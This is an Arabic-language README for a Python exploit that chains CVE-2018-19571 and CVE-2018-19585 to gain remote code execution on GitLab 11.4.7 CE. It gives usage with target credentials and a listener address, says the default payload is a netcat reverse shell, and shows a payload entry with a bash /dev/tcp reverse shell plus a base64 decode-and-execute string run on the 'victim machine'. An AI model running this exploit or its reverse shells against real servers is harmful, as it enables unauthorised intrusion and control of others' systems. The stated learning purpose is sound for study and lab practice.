
GitLab 11.4.7 ثغرة تنفيذ الأوامر عن بُعد مع قذائف عكسية مختلفة. CVE-2018-19571 + CVE-2018-19585
استغلال GitLab 11.4.7 CE RCE مع قذائف عكسية مختلفة.
CVE-2018-19571: https://nvd.nist.gov/vuln/detail/CVE-2018-19571
CVE-2018-19585: https://nvd.nist.gov/vuln/detail/CVE-2018-19585
تعديل على الإصدار من Sam Redmond و Tam Lai Yin بغرض التعلم والممارسة.
هو مكتوب بلغة Python3 كما ينبغي أن تكون الأمور.
المتطلبات:
pip3 install requests
الاستخدام:
python3 rce_script.py -u <username> -p <password> -g <url:port> -l <local ip> -P <local port> [<shell lang>]
افتراضيًا، يتم استخدام قذيفة netcat مع الخيار -e.
القذائف المدمجة الحالية:
تحتوي بعض القذائف على أحرف لا تتوافق مع ترميز الطلب. لذلك يتم تشفيرها بـ Base64 ثم فك تشفيرها وتنفيذها على جهاز الضحية.
إذا كنت ترغب في إضافة قذيفة خاصة بك، قم بإضافة قيمة إلى بنية payloads_dict.
يجب تعريف ما يلي:
'bash': {
# If the raw_payload can be executed withoud encoding
'safe': False,
# Payload, must contain the references for the local_ip and for the local_port
'raw_payload': 'bash -i >& /dev/tcp/{local_ip}/{local_port} 0>&1',
# How to execute the payload if safe is False. Must conatin the reference for payload
'exec_string': 'echo {payload} | base64 -d | /bin/bash'
}
تحليل HTML مقيد بشدة، قد يتعطل بسهولة.